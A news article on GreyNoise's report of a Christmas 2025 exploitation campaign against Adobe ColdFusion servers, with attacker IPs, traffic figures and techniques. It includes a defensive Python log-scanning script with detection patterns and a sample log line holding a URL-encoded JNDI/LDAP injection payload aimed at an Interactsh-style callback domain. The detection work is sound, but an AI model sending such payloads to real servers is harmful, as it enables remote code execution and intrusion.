DMR News


GreyNoise Flags Holiday Exploitation Campaign Targeting Adobe ColdFusion Servers

By Jolyen

Jan 5, 2026


Security researchers at GreyNoise have reported a coordinated exploitation campaign targeting Adobe ColdFusion servers, with thousands of attack attempts detected during the Christmas 2025 holiday period.

In a report published by GreyNoise, researchers said they observed a concentrated wave of malicious activity aimed at ColdFusion systems between late December and Christmas Day. The firm said the attacks were largely attributable to a single threat actor and were timed to coincide with a period when many organizations operate with reduced security monitoring.

Single Actor Behind Majority Of Attacks

According to GreyNoise, roughly 98% of the observed attack traffic originated from Japan-based infrastructure operated by CTG Server Limited. The actor systematically exploited more than 10 known ColdFusion vulnerabilities disclosed between 2023 and 2024.

The campaign relied on automated behavior and focused on exploiting multiple CVEs in rapid succession. Researchers noted that most of the activity peaked on December 25, reinforcing the assessment that the timing was intentional.

Exploitation Methods And Verification Tools

The attacks primarily used JNDI and LDAP injection techniques as the initial exploitation vector. For out-of-band verification, the actor leveraged ProjectDiscovery Interactsh to confirm successful interactions with targeted servers.

GreyNoise recorded a total of 5,940 malicious requests exploiting ColdFusion vulnerabilities from 2023 and 2024. The requests were part of a coordinated sequence rather than isolated probes.

Geographic Distribution Of Targets

Most of the targeted ColdFusion servers were located in the United States, which accounted for 4,044 of the observed requests. Spain followed with 753 requests, while India accounted for 128. Smaller volumes of activity were seen in other regions.

The researchers said the geographic spread suggests broad scanning rather than a focus on a single country or organization.

Infrastructure And Hosting Provider

GreyNoise identified two IP addresses, 134.122.136.119 and 134.122.136.96, as responsible for nearly all ColdFusion exploitation traffic. Both addresses were hosted by CTG Server Limited under autonomous system AS152194.

The two IPs operated concurrently, shared Interactsh sessions, and rotated through multiple attack techniques in an automated fashion. GreyNoise said this behavior indicates a coordinated setup rather than opportunistic exploitation.
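The JNDI/LDAP injection vector and Interactsh callbacks described above, together with the two source addresses named in the report, translate directly into a log-review check. The following is an added example written for this article (not GreyNoise's code or tooling): it walks Common Log Format access-log lines and flags requests that carry a JNDI lookup or LDAP URL, reference an out-of-band callback domain, or originate from the reported addresses. The Interactsh domain list, the request paths, and the payload shape in the sample log are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Source addresses named in the GreyNoise report summarised above.
REPORTED_SOURCE_IPS = {"134.122.136.119", "134.122.136.96"}

# Interactsh-style callback domains (assumed public defaults; replace with the
# out-of-band domains your own authorised testing is allowed to use).
OOB_DOMAINS = ("oast.fun", "oast.live", "oast.me", "oast.pro",
               "oast.site", "oast.online", "interact.sh")

# JNDI lookups and LDAP URLs embedded in request data, matched after URL-decoding.
JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)
LDAP_RE = re.compile(r"ldaps?://", re.IGNORECASE)

# Common Log Format: client IP, identity, user, [timestamp], "request line", status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3})')


def classify(line):
    """Return the reasons a single access-log line is suspicious (empty if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    ip, request, _status = m.groups()
    decoded = unquote(unquote(request))  # second pass catches double-encoded payloads
    reasons = []
    if ip in REPORTED_SOURCE_IPS:
        reasons.append("source ip listed in GreyNoise report")
    if JNDI_RE.search(decoded):
        reasons.append("jndi lookup in request")
    if LDAP_RE.search(decoded):
        reasons.append("ldap url in request")
    if any(d in decoded.lower() for d in OOB_DOMAINS):
        reasons.append("out-of-band callback domain")
    return reasons


def analyze_log(lines):
    """Map 1-based line numbers of suspicious entries to their reasons."""
    return {n: r for n, r in ((i, classify(l)) for i, l in enumerate(lines, 1)) if r}


# Constructed sample log: the paths, payload and callback host are illustrative only.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Dec/2025:03:14:07 +0000] "GET /CFIDE/administrator/ HTTP/1.1" 200 512',
    '134.122.136.119 - - [25/Dec/2025:03:14:09 +0000] "GET /index.cfm?x=%24%7Bjndi%3Aldap%3A%2F%2Fabc123.oast.fun%2Fa%7D HTTP/1.1" 500 0',
    '198.51.100.20 - - [25/Dec/2025:03:15:00 +0000] "POST /login.cfm HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for n, reasons in analyze_log(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(reasons)}")
```

Run against real logs, the source-IP check is the weakest signal, since scanning infrastructure rotates; the JNDI and callback-domain checks survive address changes.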

CTG Server Limited is registered in Hong Kong and has shown rapid growth in IP address allocations. GreyNoise noted that the provider has previously been linked to phishing, spam activity, bogon routing, and limited abuse enforcement, raising concerns about its role as a permissive hosting environment.

Part Of A Larger Scanning Operation

GreyNoise said the ColdFusion exploitation represented only a small fraction of a much broader vulnerability scanning effort. The ColdFusion traffic accounted for roughly 0.2% of a campaign that generated more than 2.5 million total requests.

Across the wider operation, the same infrastructure targeted 767 CVEs spanning the years 2001 to 2025. Researchers identified more than 1,200 attack signatures, along with thousands of unique fingerprints and out-of-band interaction domains.

Reconnaissance And Exploitation Scope

The broader campaign focused primarily on reconnaissance activity, followed by attempts at CVE exploitation, local file inclusion, and remote code execution. It targeted more than 47 technology stacks, including Java application servers, web frameworks, content management systems, network devices, and enterprise software platforms.

GreyNoise said the scale of automation, the breadth of vulnerabilities tested, and the structured attack patterns indicate a template-driven reconnaissance effort aimed at mapping exploitable systems across the global internet.

The researchers have published Indicators of Compromise associated with the campaign to support detection and response efforts.


Featured image credits: Flickr


Jolyen

As a news editor, I bring stories to life through clear, impactful, and authentic writing. I believe every brand has something worth sharing. My job is to make sure it’s heard. With an eye for detail and a heart for storytelling, I shape messages that truly connect.
